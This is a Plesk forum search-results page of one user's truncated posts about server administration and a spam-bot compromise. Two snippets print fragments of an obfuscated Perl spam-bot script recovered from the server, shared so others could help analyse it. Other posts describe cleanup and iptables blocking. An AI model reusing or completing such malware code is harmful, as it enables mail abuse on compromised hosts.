• Plesk Uservoice will be deprecated by October. Moving forward, all product feature requests and improvement suggestions will be managed through our new platform Plesk Productboard.
    To continue sharing your ideas and feedback, please visit features.plesk.com

Search results

  1. J

    Wildcards subdomains does not work in Plesk 11.5

    Of Course, but if the solutions in Plesk manual do not work I look for a solution in every place over internet. And when I find a solution I try to verify if this solution is good for my system. In this case both of this solution seemed good solutions.This situation is not Plesk specific...
  2. J

    Wildcards subdomains does not work in Plesk 11.5

    Hello When Plesk 11.0.9 I had a domain with wildcards subdomains and all worked fine. And the update to 11.5 came ... Now I see that my blogs doesnot work (I need widcards because of them) : config file was changed by a misterious hand, and more: the wildcards does not work!!!. Well, I...
  3. J

    Strange issue with Qmail

    Hello I have found something strange in control panel about SMTP service (Qmail). When I check services status of my server, I saw that SMTP was stopped, but I could send and recevie emails. I check it by ssh (/etc/init.d/qmail status and mailmng --status-smtpd) and both of them sid SMTP was...
  4. J

    Spam from hole in Plesk?

    And here is the second part my $egf3=0; my $aome=0; my $h6j2; my @i1l5=(); sub aba{ my $h2aa=$i31d; undef $h6j2; return($h6j2, $h2aa) if(ab0($i1l5[$egf3], $h2aa)); my $do81=$egf3; for($egf3=0;$egf3 < 10;$egf3++) {if($egf3==4){my @p=split '',$p; my $hf96=$p[6]; $hf96="$hf96$hf96.6$hf96."...
  5. J

    Spam from hole in Plesk?

    Of course, here is the code, I hope you can extract a valid info: The code is too long then I post in two parts, First: #!/usr/bin/perl use strict; use Socket; use CGI; srand(time ^ $$ ^ unpack "%L*", `ps axww | gzip`); $SIG{PIPE}= sub {die "Broken pipe"}...
  6. J

    Spam from hole in Plesk?

    Of course, a virus can do so, but in my server at least when I blocked sendmail the spam stopped, and when I opened sendmail spam began again. So I concluded that this bot was using sendmail service. And if a bot uses direct call to system mail, then these mails must appears in log files...
  7. J

    FTP No longer working

    Hello Exactly the same problema. This is a good solution and works for me either. Indeed this config is the necesary config for passive FTP (see proFTP doc), but until now this config doesn't was in proftpd.conf, it must be in another included file (where we can not modify anything because all...
  8. J

    Spam from hole in Plesk?

    Hello Very interesting My solution was Wrap sendmail (I receive all mails sent by sendmail) Set an individual and different sesion path for every domain subdomain Create a cron to erase session files in all sesion folder every 30 min Pass malware detect (maldet) to all the server Set a cron...
  9. J

    round cube Where is it?

    Hello Indeed webmail.domain.com works OK with Horde, then perhaps Roundcube and Horde use diferents settings. But don't worry I uninstalled RoundCube and reinstalled Horde, it's a good solution for me. Thanks
  10. J

    iptables rule to block all outgoing mail sent via perl (or other) scripts

    Hi, a good idea I've a question about these rules, could add a LOG, something like -j LOG --log-prefix "Alert QMAIL-REJECTED" in last rule for example? Oh, and another question, does it work with qmail? Thanks
  11. J

    SSH access troubles

    Oh, I'm silly Thanks for your idea That's strange. I couldn't stop IPTablse because I had no SSH Access, so I uninstalled Firewall Extensión, but the problem didnt dissapear. (?) So I reinstall Firewall Extension from Plesk and I wrote a custom rule with Access to my SSH port (I dont use...
  12. J

    SSH access troubles

    Hello I run centos 5.4 Plesk 11.5.30 I cant Access SSH. It gives me a connect time out error. Neither can Access FTP in pasive mode. I reinit server and SSH runs Ok as proFTP does. But after a few minutes SSH gone doan again, the timeout error And FTP can work in pasive mode. Any...
  13. J

    Spam from hole in Plesk?

    Well, but I don't have RoundCube installed, I have Horde so the hole is not only in RoundCube. And now I have another spam problem, worse than this one. Perhaps related with it or not, dont know. From my server is being sent spam mails but there no logs about them, no one log, nothing of...
  14. J

    Spam from my server???

    I need help, please. I hove no idea how is hapening this spam from my IP. There is no data in mail log, MailerDaemon dosenot return email bounced I see now in SNDS of Hotmail more tan 5000 mails from my IP. This is the header of one email (I've got it in SNDS) (xx.xx.xx.xx is my IP)...
  15. J

    Looking for origin of spam from my server

    That is an empty message, error. I on't know how to delete. Sorry.
  16. J

    Spam from my server???

    I've received a report from aol about a spam from my server, and by the same time my Ip appears in CBL. In the header of the message I read Return-Path: <[email protected]> Received: from mydomain.com (mydomain.com [xxx.xxx.xxx.xxx]) by mtain-dd01.r1000.mx.aol.com (Internet Inbound)...
  17. J

    Spam from hole in Plesk?

    It looks like sesión hijack, but it uses always the about the same name for sesión file sin /tmp/ Now, I changed the sesssion.save_path in php.ini, every subdomains has its own tmp so I hope find the way it uses to enter the server. Regards
  18. J

    round cube Where is it?

    Mmm? I dont thnk so. You must know that *.domain.com is useful to create subdomains without having to set DNS for every subdomain. With this setting Horde Works fine. And the icon for webmail appears in mail config for the domain. But it doesnt wrok for Roundcube.
  19. J

    Cant login webmail

    Thanks by info I found the solution: it was an issue with sesión folder. Thanks
  20. J

    round cube Where is it?

    I supposed so but it goes to the main page ot the domain (i have configured *.domain.com to main page) .... and the icons to webmail daesnt appear in control panel of user, like does with horde. Regards
Back
Top